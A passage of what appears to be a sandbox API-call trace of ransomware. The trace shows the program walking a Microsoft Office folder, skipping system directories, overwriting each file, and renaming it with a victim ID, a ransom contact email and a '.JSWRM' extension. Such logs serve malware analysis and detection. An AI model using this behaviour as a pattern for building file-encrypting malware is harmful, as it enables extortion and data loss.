cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0116.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.VSL", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE.VSL", lpUsedDefaultChar=0x0) returned 6 [0116.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.VSL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0116.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.VSL", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE.VSL", lpUsedDefaultChar=0x0) returned 6 [0116.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0116.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0116.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0116.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pe.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.116] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=237152) returned 1 [0116.116] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.116] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.128] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.128] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.129] CloseHandle (hObject=0x238) returned 1 [0116.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0116.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0116.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0116.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0116.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0116.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pe.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PE.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pe.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0116.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0116.130] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46fe4fe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46fe4fe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46fe4fe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PIPELINE.VRD", cAlternateFileName="")) returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2=".") returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="..") returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="...") returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="windows") returned -1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="recovery") returned -1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="perflogs") returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="documents and settings") returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="$RECYCLE.BIN") returned 1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="system volume information") returned -1 [0116.130] lstrcmpiW (lpString1="PIPELINE.VRD", lpString2="msocache") returned 1 [0116.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PIPELINE.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PIPELINE.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PIPELINE.VRD", lpUsedDefaultChar=0x0) returned 12 [0116.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0116.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PIPELINE.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PIPELINE.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PIPELINE.VRD", lpUsedDefaultChar=0x0) returned 12 [0116.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0116.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0116.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0116.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pipeline.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.131] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1920) returned 1 [0116.131] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0116.131] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0116.133] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.133] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0116.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0116.133] CloseHandle (hObject=0x238) returned 1 [0116.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0116.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0116.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0116.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0116.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pipeline.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PIPELINE.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pipeline.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0116.135] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3acdc360, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3acdc360, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b580a61, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x431068, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PJINTL.DLL", cAlternateFileName="")) returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2=".") returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="..") returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="...") returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="windows") returned -1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="recovery") returned -1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="perflogs") returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="documents and settings") returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="system volume information") returned -1 [0116.135] lstrcmpiW (lpString1="PJINTL.DLL", lpString2="msocache") returned 1 [0116.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PJINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0116.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PJINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0116.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0116.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.135] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3d74ea0, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3d74ea0, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3d74ea0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3060, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PMENURES.DLL", cAlternateFileName="")) returned 1 [0116.135] lstrcmpiW (lpString1="PMENURES.DLL", lpString2=".") returned 1 [0116.135] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="..") returned 1 [0116.135] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="...") returned 1 [0116.135] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="windows") returned -1 [0116.136] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="recovery") returned -1 [0116.136] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="perflogs") returned 1 [0116.136] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="documents and settings") returned 1 [0116.136] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0116.136] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="system volume information") returned -1 [0116.136] lstrcmpiW (lpString1="PMENURES.DLL", lpString2="msocache") returned 1 [0116.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMENURES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMENURES.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PMENURES.DLL", lpUsedDefaultChar=0x0) returned 12 [0116.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0116.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMENURES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMENURES.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PMENURES.DLL", lpUsedDefaultChar=0x0) returned 12 [0116.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0116.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0116.136] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5e43de4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5e43de4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa38f59d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70876, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="POWERPNT.HXS", cAlternateFileName="")) returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2=".") returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="..") returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="...") returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="windows") returned -1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="recovery") returned -1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="perflogs") returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="documents and settings") returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="$RECYCLE.BIN") returned 1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="system volume information") returned -1 [0116.136] lstrcmpiW (lpString1="POWERPNT.HXS", lpString2="msocache") returned 1 [0116.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.HXS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.HXS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT.HXS", lpUsedDefaultChar=0x0) returned 12 [0116.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0116.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.HXS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.HXS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT.HXS", lpUsedDefaultChar=0x0) returned 12 [0116.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0116.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0116.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.137] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=460918) returned 1 [0116.137] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.137] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.180] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.180] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.181] CloseHandle (hObject=0x238) returned 1 [0116.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0116.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.181] RtlAllocateHeap 